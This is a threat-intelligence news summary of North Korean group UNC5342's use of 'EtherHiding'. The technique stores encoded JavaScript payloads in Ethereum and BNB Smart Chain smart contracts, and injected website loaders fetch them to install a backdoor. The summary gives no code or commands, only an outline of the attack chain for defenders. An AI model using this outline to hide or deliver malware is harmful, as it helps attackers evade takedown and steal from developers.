North Korea’s UNC5342 Uses EtherHiding to Deliver Malware via Blockchains

TL;DR

Google Threat Intelligence Group reports that the DPRK-linked threat cluster UNC5342 has been using EtherHiding since February 2025 to deliver malware and steal cryptocurrency. The technique stores JavaScript payloads in smart contracts on public chains like Ethereum and BNB Smart Chain, which malicious loaders retrieve via read-only calls.

What happened

Google Threat Intelligence Group (GTIG) has observed North Korean operators from UNC5342 incorporate a technique called EtherHiding into an ongoing social-engineering campaign tracked since February 2025. In this campaign — referenced by industry as 'Contagious Interview' — attackers use fake recruitment interactions to trick developers into running malicious code. Compromised sites (often WordPress installations accessed through vulnerabilities or stolen credentials) are injected with a small loader script. When a victim visits, the loader makes read-only blockchain calls to smart contracts on networks such as BNB Smart Chain and Ethereum to fetch Base64-encoded and XOR-encrypted JavaScript payloads. These loaders, associated with the JADESNOW family, decrypt and execute further stages that commonly deliver the INVISIBLEFERRET backdoor for persistent access and credential theft. GTIG notes this is the first time it has observed a nation-state actor adopting EtherHiding, a method that leverages blockchains as resilient, hard-to-takedown payload repositories.

Why it matters

• Storing malicious payloads in smart contracts removes a central server to take down, increasing operational resilience for attackers.
• Read-only blockchain calls leave little on-chain transaction history, making retrieval actions stealthier and harder to trace.
• The technique supports rapid updates to malicious payloads, enabling attackers to change tactics or swap malware without modifying compromised websites.
• The campaign targets developers and cryptocurrency-related professionals, aligning theft and espionage objectives with potential sanctions-evasion incentives.

Key facts

• GTIG observed UNC5342 using EtherHiding beginning in February 2025.
• EtherHiding first emerged publicly in September 2023 in the financially motivated CLEARFAKE campaign (UNC5142).
• UNC5342’s campaign is tracked as 'Contagious Interview' by industry, leveraging fake job offers and technical interview tasks to lure victims.
• Attackers compromise legitimate websites, often WordPress sites, via vulnerabilities or stolen credentials and inject a JavaScript loader.
• Loaders retrieve malicious JavaScript payloads from smart contracts on public chains such as BNB Smart Chain and Ethereum using read-only calls (e.g., eth_call).
• JADESNOW is the JavaScript downloader used by UNC5342 to fetch, decrypt (Base64 and XOR), and execute payloads stored in smart contracts.
• The infection chain frequently culminates in INVISIBLEFERRET, a Python-based backdoor used for persistent access, espionage, and data theft.
• Actors employ elaborate social-engineering tactics including fake recruiters, fabricated company sites, and communications on Telegram or Discord.
• Malicious packages in some variations are hosted on registries like npm and delivered as part of technical test materials or deceptive update prompts.

What to watch next

• Monitoring for further industry reporting that other nation-state groups adopt EtherHiding: not confirmed in the source.
• Increased attention to fake recruitment lures, fabricated company pages, and technical interview scams targeting developers.
• Signals of malicious smart contracts hosting encoded payloads on public chains and anomalous read-only contract queries: not confirmed in the source.

Quick glossary

• EtherHiding: A technique where attackers embed malicious code in smart contracts on public blockchains and retrieve it via read-only calls to avoid conventional takedown.
• Smart contract: Self-executing code deployed on a blockchain that runs under predefined rules; can store data and respond to calls.
• eth_call (read-only call): A method to query smart contract data without creating an on-chain transaction or incurring gas fees; does not alter chain state.
• Backdoor: Malware that provides persistent remote access to a compromised system, enabling data theft, espionage, or further intrusion.
• Social engineering: Techniques attackers use to manipulate people into divulging information or performing actions that enable compromise.

Reader FAQ

Who is UNC5342?
UNC5342 is a threat cluster GTIG associates with North Korean (DPRK) activity and has been observed using EtherHiding since February 2025.

What is JADESNOW?
JADESNOW is a JavaScript-based downloader used by UNC5342 to fetch, decrypt, and execute payloads stored in smart contracts.

Which blockchains are being used for EtherHiding?
GTIG observed deployments on Ethereum and BNB Smart Chain; broader use across other chains is not confirmed in the source.

Is the use of EtherHiding by nation-state actors widespread?
GTIG reports this as the first observed instance of a nation-state actor using EtherHiding; wider adoption is not confirmed in the source.

Written by: Blas Kojusner, Robert Wallace, Joseph Dobson Google Threat Intelligence Group (GTIG) has observed the North Korea (DPRK) threat actor UNC5342 using ‘EtherHiding’ to deliver malware and facilitate cryptocurrency…

Sources

• DPRK Adopts EtherHiding: Nation-State Malware Hiding on Blockchains
• North Korean Hackers Use EtherHiding to Hide Malware …
• North Korean threat actors turn blockchains into malware …
• North Korean Hackers Use Blockchain to Hide Crypto- …

Related posts

• UNC5142 Abuses BNB Smart Chain and EtherHiding to Spread Infostealers
• New ROBOT Malware Family Linked to Russian State-Sponsored COLDRIVER
• Pro-Russia Influence Networks Exploit September Drone Incursion into Poland